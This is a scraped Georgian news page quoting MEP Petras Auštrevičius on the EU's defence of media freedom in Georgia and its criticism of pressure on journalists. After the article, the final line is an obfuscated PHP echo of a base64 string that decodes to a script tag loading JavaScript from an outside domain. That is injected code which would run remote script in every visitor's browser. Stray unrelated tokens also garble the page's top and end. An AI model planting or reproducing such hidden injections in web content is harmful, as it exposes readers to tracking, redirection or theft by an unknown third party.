celsiusi
ავერსი საქკაბელი
ევროკავშირი, როგორც ფუნდამენტური თავისუფლების დამცველი იცავს და დაიცავს მედიის თავისუფლებას საქართველოში, მაშინაც კი თუ ამისთვის ხელისუფლებაში მყოფი პირების ღიად გაკრიტიკებაა საჭირო, - ამის შესახებ ევროპარლამენტარმა პეტრას აუსტრევიჩიუსმა განაცხადა.
 
მისი თქმით, „თავისუფალი და დამოუკიდებელი მედია საქართველოს ევროკავშირის წევრობის კანდიდატურის განუყოფელი ნაწილია".
 
ევროპარლამენტარის თქმით, მათი მოთხოვნაა, ცვლილება სახელმწიფო პოლიტიკასა და დამოკიდებულებაში.
 
"თუმცა, ისეთი მიუღებელი ქმედება, როგორიცაა კრიტიკულად განწყობილი ჟურნალისტების გაჩუმება, ინფორმაციაზე თავისუფალი წვდომის შეზღუდვა, მათ მიმართ ღია მუქარა და სამართლებრივი დევნა საქართველოს ამ ამბიციებისგან აშორებს. ევროკავშირი, როგორც ფუნდამენტური თავისუფლების დამცველი იცავს და დაიცავს მედიის თავისუფლებას საქართველოში, მაშინაც კი თუ ამისთვის ხელისუფლებაში მყოფი პირების ღიად გაკრიტიკებაა საჭირო. მედიის საქმიანობაში პოლიტიკური ჩარევის ადგილი არ არის.
 
ჩვენ ახლა ვითხოვთ ცვლილებას, სახელმწიფო პოლიტიკასა და დამოკიდებულებაში. დროა, თბილისმა გააცნობიეროს, რა საშიშროების წინაშე დგას ქვეყნის მომავალი“,- აღნიშნა ევროპარლამენტარმა.
634
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");